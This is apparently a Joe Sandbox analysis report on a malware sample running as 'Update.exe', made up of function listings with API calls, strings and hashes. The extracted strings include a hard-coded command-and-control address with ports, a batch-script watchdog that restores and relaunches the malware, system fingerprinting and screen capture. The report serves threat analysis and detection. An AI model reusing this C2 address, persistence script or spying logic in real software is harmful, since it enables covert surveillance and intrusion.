Opcode ID: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
Instruction ID: 71972da321696c7643696fa2d61077c4bfdb6251f9c85b9dd911fab2e4c9aeed
Opcode Fuzzy Hash: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
Instruction Fuzzy Hash: EF017976D00118BADB04AB55DD41DDEB7BCEF48714B10417BF901B31D1EB746A4086A8

Function 00403AB1 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB

??3@YAXPAX@Z.MSVCRT(?,?,?,00413550,00413558), ref: 00403AFD
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00413550,00413558), ref: 00403B05
SetWindowTextW.USER32(?,?), ref: 00403B12
??3@YAXPAX@Z.MSVCRT(?), ref: 00403B1D

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??3@TextWindow$Length
String ID:
API String ID: 2308334395-0
Opcode ID: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
Instruction ID: 2cc122b1f520d7f8021a056a959bf32eecafdcf33a956e59961b1277582e5a57
Opcode Fuzzy Hash: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
Instruction Fuzzy Hash: 2EF0FF32D0410DBACF01FBA5DD46CDE7B79EF04705B10406BF501720A1EA79AB559B98

Function 0040702A Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,0000005C,?), ref: 00407045
CreateFontIndirectW.GDI32(?), ref: 0040705B
GetDlgItem.USER32(?,000004B5), ref: 0040706F
SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: CreateFontIndirectItemMessageObjectSend
String ID:
API String ID: 2001801573-0
Opcode ID: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
Instruction ID: 5c236ef126686a3da9008926c30106754acf3bfa0ff8e01310dffb34f405da6a
Opcode Fuzzy Hash: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
Instruction Fuzzy Hash: 35F05475900704ABDB209BA4DC09F8B7BFCAB48B01F048139BD51E11D4D7B4E5018B19

Function 00401BA3 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00401BA8
GetWindowRect.USER32(?,?), ref: 00401BC1
ScreenToClient.USER32(00000000,?), ref: 00401BCF
ScreenToClient.USER32(00000000,?), ref: 00401BD6

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ClientScreen$ParentRectWindow
String ID:
API String ID: 2099118873-0
Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61

Function 00403C63 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 00403C89

Strings

GUIFlags, xrefs: 00403C68
[G@, xrefs: 00403C64, 00403C88

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: _wtol
String ID: GUIFlags$[G@
API String ID: 2131799477-2126219683
Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D

Function 00402F10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52

Strings

?O@, xrefs: 00402F23

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: EnvironmentVariable
String ID: ?O@
API String ID: 1431749950-3511380453
Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98

Analysis Process: Update.exePID: 4348, Parent PID: 2140COMMON

Execution Graph

Execution Coverage:	6.5%
Dynamic/Decrypted Code Coverage:	26.6%
Signature Coverage:	5.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	40

Executed Functions

Function 037F5430 Relevance: 93.2, APIs: 40, Strings: 13, Instructions: 440
stringnetworklibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 037FF707: _malloc.LIBCMT ref: 037FF721

_memset.LIBCMT ref: 037F546C
_memset.LIBCMT ref: 037F5485
_memset.LIBCMT ref: 037F5495
gethostname.WS2_32(?,00000032), ref: 037F54A3
gethostbyname.WS2_32(?), ref: 037F54AD
inet_ntoa.WS2_32 ref: 037F54C5
_strcat_s.LIBCMT ref: 037F54D8
_strcat_s.LIBCMT ref: 037F54F1
inet_ntoa.WS2_32 ref: 037F551A
_strcat_s.LIBCMT ref: 037F552D
_strcat_s.LIBCMT ref: 037F5546
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 037F5573
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 037F5587
GetLastInputInfo.USER32(?), ref: 037F559A
GetTickCount.KERNEL32 ref: 037F55A0
wsprintfW.USER32 ref: 037F55D5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 037F55E8
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 037F55FC
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 037F5653
wsprintfW.USER32 ref: 037F566C
GetForegroundWindow.USER32 ref: 037F5695
GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 037F56AC
lstrlenW.KERNEL32(000008CC), ref: 037F56D3
lstrlenW.KERNEL32(00000994), ref: 037F5739
GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 037F57AA
GetProcAddress.KERNEL32(00000000), ref: 037F57B1
GetNativeSystemInfo.KERNEL32(?), ref: 037F57C2
GetSystemInfo.KERNEL32(?), ref: 037F57CD
wsprintfW.USER32 ref: 037F5806
GetCurrentProcessId.KERNEL32 ref: 037F5818
OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 037F582E
K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 037F584B
CloseHandle.KERNEL32(03815164), ref: 037F587F
GetTickCount.KERNEL32 ref: 037F58E9
__time64.LIBCMT ref: 037F58F8
__localtime64.LIBCMT ref: 037F592F
wsprintfW.USER32 ref: 037F5968
GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 037F597D
GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 037F598C
GetCurrentHwProfileW.ADVAPI32(?), ref: 037F5999

Part of subcall function 037F80F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 037F8132
Part of subcall function 037F80F0: lstrcmpiW.KERNEL32(?,A:\), ref: 037F8166
Part of subcall function 037F80F0: lstrcmpiW.KERNEL32(?,B:\), ref: 037F8176
Part of subcall function 037F80F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 037F81A6
Part of subcall function 037F80F0: lstrlenW.KERNEL32(?), ref: 037F81B7
Part of subcall function 037F80F0: __wcsnicmp.LIBCMT ref: 037F81CE
Part of subcall function 037F80F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 037F8204

Strings

x64, xrefs: 037F57ED
Network, xrefs: 037F56C2, 037F5728
x86, xrefs: 037F57F4, 037F57F9
X86 %s, xrefs: 037F5800
1.0, xrefs: 037F5702
GROUP, xrefs: 037F56E0
%d min, xrefs: 037F55CF
REMARK, xrefs: 037F5746
2024.12.13, xrefs: 037F5758
X86, xrefs: 037F59B1, 037F59D3
kernel32.dll, xrefs: 037F576F
AppEvents, xrefs: 037F56B6, 037F571C
GetNativeSystemInfo, xrefs: 037F576A

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
String ID: %d min$1.0$2024.12.13$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
API String ID: 1101047656-3994836811
Opcode ID: f1bdc08f4aefec6f9c125d8d84945c737a97f7a3763f7232a0b0fa96da5518f4
Instruction ID: a2ae0ff94ff1e13b1c224066a2d6038cfd9f30f405a652cb685bab3ca5bad152
Opcode Fuzzy Hash: f1bdc08f4aefec6f9c125d8d84945c737a97f7a3763f7232a0b0fa96da5518f4
Instruction Fuzzy Hash: CAF1D4B5940704AFD724EBA4CC85FEAB3BCBF85700F004598E71AE7281EA70AA44CF55

Function 6CA87E80 Relevance: 76.9, APIs: 19, Strings: 24, Instructions: 1627fileprocessCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104,?), ref: 6CA87ED6
_strlen.LIBCMT ref: 6CA87EF2
_strlen.LIBCMT ref: 6CA881F6
_strlen.LIBCMT ref: 6CA887FD
_strlen.LIBCMT ref: 6CA88A61
CopyFileA.KERNEL32(6CA99F47,?,00000000), ref: 6CA88C17
_strlen.LIBCMT ref: 6CA88C7B
CopyFileA.KERNEL32(00000000,?,00000000), ref: 6CA88E42
_strlen.LIBCMT ref: 6CA8848C

Part of subcall function 6CA811B0: _strlen.LIBCMT ref: 6CA811E3

_strlen.LIBCMT ref: 6CA88EDD
OpenProcess.KERNEL32(00000410,00000000,00000000,00000000,?,00000001,00000040,00000001), ref: 6CA89143
CloseHandle.KERNEL32(00000000), ref: 6CA8914E
CreateProcessA.KERNEL32 ref: 6CA89199
_strlen.LIBCMT ref: 6CA891C3
CloseHandle.KERNEL32(?,?,00000002,00000040,00000001), ref: 6CA89417
CloseHandle.KERNEL32(?), ref: 6CA8941F
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA8946E
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA894BD
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA89596

Strings

.pid, xrefs: 6CA892DF
.bat, xrefs: 6CA88949
cmd.exe /B /c "%s", xrefs: 6CA8899C
Failed to create backup EXE. Please check the EXE path: , xrefs: 6CA88E56
if %ERRORLEVEL% neq 0 (, xrefs: 6CA88769
set "BackupProcessPath=, xrefs: 6CA881C3
copy /Y "%BackupProcessPath%" "%ProcessPath%", xrefs: 6CA886DD
copy /Y "%BackupDLLPath%" "%DLLPath%", xrefs: 6CA8872D
set "ProcessPath=, xrefs: 6CA88186
Failed to create backup DLL. Please check the DLL path: , xrefs: 6CA88C2B
if not exist "%DLLPath%" (, xrefs: 6CA88705
goto CheckProcess, xrefs: 6CA887B9
tor., xrefs: 6CA892E7
set "DLLPath=, xrefs: 6CA88422
if not exist "%ProcessPath%" (, xrefs: 6CA886BB
@echo off, xrefs: 6CA88129
echo DLL file not found, restoring from backup..., xrefs: 6CA88719
set "ProcessName=, xrefs: 6CA88151
start "" "%ProcessPath%", xrefs: 6CA8877D
set "BackupDLLPath=, xrefs: 6CA88459
tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul, xrefs: 6CA88755
timeout /t 30 /nobreak >nul, xrefs: 6CA887A5
echo Process file not found, restoring from backup..., xrefs: 6CA886C9
:CheckProcess, xrefs: 6CA8813D

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: _strlen$CloseHandleIos_base_dtorstd::ios_base::_$CopyFileProcess$CreateOpenPathTemp
String ID: copy /Y "%BackupDLLPath%" "%DLLPath%"$ copy /Y "%BackupProcessPath%" "%ProcessPath%"$ echo DLL file not found, restoring from backup...$ echo Process file not found, restoring from backup...$ start "" "%ProcessPath%"$.bat$.pid$:CheckProcess$@echo off$Failed to create backup DLL. Please check the DLL path: $Failed to create backup EXE. Please check the EXE path: $cmd.exe /B /c "%s"$goto CheckProcess$if %ERRORLEVEL% neq 0 ($if not exist "%DLLPath%" ($if not exist "%ProcessPath%" ($set "BackupDLLPath=$set "BackupProcessPath=$set "DLLPath=$set "ProcessName=$set "ProcessPath=$tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul$timeout /t 30 /nobreak >nul$tor.
API String ID: 321380216-101450228
Opcode ID: 7da80d1a6264a60a51068aeb452e1e7a9cb52deb50854ae99d00d0d5e5738888
Instruction ID: 5fc499b5dde7a16966b16e2abbbec593da742807be589b7285ef4d9267d1615a
Opcode Fuzzy Hash: 7da80d1a6264a60a51068aeb452e1e7a9cb52deb50854ae99d00d0d5e5738888
Instruction Fuzzy Hash: C1E29EB1901B048FD324CF38C984BA7B7E6BF95308F044A2DD59A87B81EB75E589CB51

Function 00C70032 Relevance: 70.8, APIs: 2, Strings: 38, Instructions: 795memoryCOMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 00C704AE
VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 00C704DE

Strings

p, xrefs: 00C700F7
Fu, xrefs: 00C7025A
b, xrefs: 00C70113
Li, xrefs: 00C7010C
Via, xrefs: 00C70312
S, xrefs: 00C700E7
mI, xrefs: 00C70221
A, xrefs: 00C70244
Syst, xrefs: 00C70219
Rt, xrefs: 00C70233
ucti, xrefs: 00C701BE
tu, xrefs: 00C70137
yA, xrefs: 00C70125
st, xrefs: 00C701AD
Vi, xrefs: 00C7012C
P, xrefs: 00C70176
iv, xrefs: 00C70212
a, xrefs: 00C7011C
tu, xrefs: 00C70166
ctio, xrefs: 00C7026B
Lo, xrefs: 00C700FC
ushI, xrefs: 00C7019B
A, xrefs: 00C70147
ee, xrefs: 00C700F0
a, xrefs: 00C70103
fo, xrefs: 00C7022C
t, xrefs: 00C70187
o, xrefs: 00C701C9
tNat, xrefs: 00C7020A
Cach, xrefs: 00C701FA
G, xrefs: 00C70205
a, xrefs: 00C7013E
a, xrefs: 00C7016D
F, xrefs: 00C7018C
b, xrefs: 00C70287
oc, xrefs: 00C70154
otec, xrefs: 00C7017F
Ta, xrefs: 00C7027D

Memory Dump Source

Source File: 00000003.00000002.3509855269.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c70000_Update.jbxd

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
API String ID: 2032221330-2899676511
Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
Instruction ID: 59d583895cb0ad254aa07879836a6108f5843e1caa84a7839f31bc5f99876074
Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
Instruction Fuzzy Hash: 02628D71508385CFD720CF24C840BABBBE4FF94714F14882DE9D99B292E770AA49CB56

Function 037FDF10 Relevance: 61.6, APIs: 24, Strings: 11, Instructions: 354
sleepregistrysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03800542: __fassign.LIBCMT ref: 03800538

Sleep.KERNEL32(00000000), ref: 037FDF64
CloseHandle.KERNEL32(00000000), ref: 037FDF91
GetLocalTime.KERNEL32(?), ref: 037FDFA9
wsprintfW.USER32 ref: 037FDFE0
SetUnhandledExceptionFilter.KERNEL32(037F75B0), ref: 037FDFEE
CloseHandle.KERNEL32(00000000), ref: 037FE007

Part of subcall function 037FF707: _malloc.LIBCMT ref: 037FF721

EnumWindows.USER32(037F5CC0,?), ref: 037FE19D
Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 037FE1AA
EnumWindows.USER32(037F5CC0,?), ref: 037FE1BE
Sleep.KERNEL32(00000BB8), ref: 037FE1F5
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 037FE241
Sleep.KERNEL32(00000FA0), ref: 037FE2C4
RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 037FE2EB
RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 037FE30B
CloseHandle.KERNEL32(?), ref: 037FE35D
Sleep.KERNEL32(000003E8,?,?), ref: 037FE3A4
WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 037FE3D0
CloseHandle.KERNEL32(?,?,?), ref: 037FE3D7
Sleep.KERNEL32(000003E8,?,?), ref: 037FE3E2
CloseHandle.KERNEL32(?), ref: 037FE400
WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 037FE425
CloseHandle.KERNEL32(?,?,?), ref: 037FE42C
Sleep.KERNEL32(00000000,?,?,?), ref: 037FE446
CloseHandle.KERNEL32(?), ref: 037FE464

Strings

9092, xrefs: 037FE0D0
9091, xrefs: 037FE08F, 037FE0D7, 037FE135, 037FE1CE, 037FE20C
9093, xrefs: 037FE12E
137.220.229.61, xrefs: 037FE071
Console, xrefs: 037FE2D5
137.220.229.61, xrefs: 037FE117
137.220.229.61, xrefs: 037FE07B, 037FE0C3, 037FE121, 037FE1E5, 037FE253
IpDatespecial, xrefs: 037FE305
137.220.229.61, xrefs: 037FE0B9
9091, xrefs: 037FE088
%4d.%2d.%2d-%2d:%2d:%2d, xrefs: 037FDFDA

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
String ID: %4d.%2d.%2d-%2d:%2d:%2d$137.220.229.61$137.220.229.61$137.220.229.61$137.220.229.61$9091$9091$9092$9093$Console$IpDatespecial
API String ID: 1511462596-4238507324
Opcode ID: d2b55334de014e9d933e4188922bf00a8950e001b0b69b0e4bb044f9c20392e0
Instruction ID: 760493ee5417d4df732e3a345f8e214d45763302d6ff6d1822fc05551342c85c
Opcode Fuzzy Hash: d2b55334de014e9d933e4188922bf00a8950e001b0b69b0e4bb044f9c20392e0
Instruction Fuzzy Hash: CDD1DFB0944700AFD320EFA4DC89E2EFBA8FBC5B00F144AACF65596395DB749544CB62

Function 037FBC70 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 351
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDesktopWindow.USER32 ref: 037FBC8F
GetDC.USER32(00000000), ref: 037FBC9C
CreateCompatibleDC.GDI32(00000000), ref: 037FBCA2
GetDC.USER32(00000000), ref: 037FBCAD
GetDeviceCaps.GDI32(00000000,00000008), ref: 037FBCBA
GetDeviceCaps.GDI32(00000000,00000076), ref: 037FBCC2
ReleaseDC.USER32(00000000,00000000), ref: 037FBCD3
GetSystemMetrics.USER32(0000004E), ref: 037FBCF8
GetSystemMetrics.USER32(0000004F), ref: 037FBD26
GetSystemMetrics.USER32(0000004C), ref: 037FBD78
GetSystemMetrics.USER32(0000004D), ref: 037FBD8D
CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 037FBDA6
SelectObject.GDI32(?,00000000), ref: 037FBDB4
SetStretchBltMode.GDI32(?,00000003), ref: 037FBDC0
GetSystemMetrics.USER32(0000004F), ref: 037FBDCD
GetSystemMetrics.USER32(0000004E), ref: 037FBDE0
StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 037FBE07
_memset.LIBCMT ref: 037FBE7A
GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 037FBE97
_memset.LIBCMT ref: 037FBEAF

Part of subcall function 037FF707: _malloc.LIBCMT ref: 037FF721

DeleteObject.GDI32(?), ref: 037FBF23
DeleteObject.GDI32(?), ref: 037FBF2D
ReleaseDC.USER32(00000000,?), ref: 037FBF39
DeleteObject.GDI32(?), ref: 037FBFDF
DeleteObject.GDI32(?), ref: 037FBFE9
ReleaseDC.USER32(00000000,?), ref: 037FBFF5

Strings

gfff, xrefs: 037FBD10
gfff, xrefs: 037FBD38
6, xrefs: 037FBE61
(, xrefs: 037FBE3E

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
String ID: ($6$gfff$gfff
API String ID: 3293817703-713438465
Opcode ID: fd9f0f1e58f6c9291fd2e713556056241cc13845ee647c6cbaaab2b338e23295
Instruction ID: c163cfefa21228d833e31ac27e7b6c5e6333af9be242fd9b72f9c994521686c4
Opcode Fuzzy Hash: fd9f0f1e58f6c9291fd2e713556056241cc13845ee647c6cbaaab2b338e23295
Instruction Fuzzy Hash: 68D157B5E01308AFDB14EFE9E889A9EBBB9FF48300F144529F505AB340D774A945CB91

Function 6CA86EB0 Relevance: 33.8, APIs: 17, Strings: 2, Instructions: 536
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6CA86520: CryptStringToBinaryA.CRYPT32(6CA86EEE,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6CA86570
Part of subcall function 6CA86520: CryptStringToBinaryA.CRYPT32(C708C483,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6CA8660E

CryptAcquireContextW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000008), ref: 6CA86FCE
CryptImportKey.ADVAPI32(00000000,00000208,00000014,00000000,00000000,00000000), ref: 6CA87024
CryptSetKeyParam.ADVAPI32(00000000,00000001,00000000,00000000), ref: 6CA8703C
CryptSetKeyParam.ADVAPI32(00000000,00000004,00000001,00000000), ref: 6CA87062
CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?), ref: 6CA87123
CryptDestroyKey.ADVAPI32(00000000), ref: 6CA8712E
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6CA87139
___std_exception_copy.LIBVCRUNTIME ref: 6CA873FF

Part of subcall function 6CA9D2B3: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?), ref: 6CA9D314

Part of subcall function 6CA826C0: _strlen.LIBCMT ref: 6CA82718

Strings

ed__, xrefs: 6CA86F24
Salt, xrefs: 6CA86F1D

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
